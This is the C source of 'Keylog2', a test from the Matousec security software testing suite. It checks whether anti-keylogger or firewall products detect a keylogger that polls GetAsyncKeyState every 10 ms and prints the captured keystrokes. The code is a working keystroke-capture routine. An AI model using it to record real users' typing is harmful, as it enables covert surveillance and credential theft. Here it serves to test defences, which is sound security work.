/*

 Security Software Testing Suite - Keylog2 (spying test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * This method is used by Anti-Keylogger Tester - GetAsyncKeyState test,
     written by Guillaume Kaddouch - http://www.firewallleaktester.com/aklt.htm.

   * This method is also used by Simple Keylogger leaktest v1.0 - GetAsyncKeyState method,
     written by System Safety Limited.


 Method description:

   * Every 10 miliseconds determine the state of the keyboard using GetAsyncKeyState API for each key code.

*/


#include <stdio.h>
#include <windows.h>
#include "include/common.h"
#include "include/common-hook.h"
#include "include/common-spy.h"


// the test specific constant which determines whether a key is being pressed
#define KEY_DOWN KEY_DOWN_SHORT


/*
 A thread routine which intercepts the keystrokes.

 'arg' A pointer to the spying tests structure.

 If the pattern was found the return value is TRUE, otherwise it is FALSE.
*/

DWORD WINAPI keylogging_thread_routine(PCOM_SPY_DATA kd)
{
  BOOL keyb_stat[KEY_CNT];

  int done=FALSE;
  while (!done)
  {
    DWORD wres=WaitForSingleObject(kd->event,10);
    switch (wres)
    {
      case WAIT_TIMEOUT:
      {
        for (int i=0;i<KEY_CNT;i++)
        {
          SHORT key=GetAsyncKeyState(i);

          if ((key & KEY_DOWN) && (!keyb_stat[i]))
          {
            UINT chr_val=MapVirtualKey(i,2);
            char chr=LOBYTE(chr_val);

            done=com_spy_print_and_check_input(chr,kd);
          }

          keyb_stat[i]=(key & KEY_DOWN)!=0;
        }

        break;
      }

      case WAIT_OBJECT_0:
        done=TRUE;
       break;

      default:
        if (wres!=WAIT_FAILED) SetLastError(ERROR_SUCCESS);
        com_err_set(kd->err_inf,"Unknown error occurred, WaitForSingleObject returned %ld.\n",wres);

        done=TRUE;
        break;
    }
  }

  return kd->res;
}



int main(int argc,char **argv)
{
  COM_CONF conf;
  if (!com_console_init_main("Keylog2","keylog2",argc,argv,&conf,COM_TEST_TYPE_KEYLOG2)) return 1;

  char *used_dlls[]={"user32.dll"};
  if (!com_hook_load_libraries(used_dlls,1)) return 1;

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  COM_SPY_DATA kd;
  if (com_spy_data_init(&kd,&conf,&err_inf))
  {

    HANDLE thread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)keylogging_thread_routine,&kd,0,NULL);
    if (thread)
    {
      if (com_verbosity_get()) printf("Keylogging thread started.\n");

      printf("Press any key to exit.\n\nCaptured data:\n");

      if (!SetForegroundWindow(GetDesktopWindow()))
        printf("Unable to set foreground window, please switch to another window manually.\n");

      com_spy_wait(&kd,thread);

      CloseHandle(thread);
    } else com_err_set(&err_inf,"Unable to create thread.\n");

    res=kd.res;
    com_spy_data_finit(&kd);
  }

  return com_end(res,&err_inf,&conf);
}
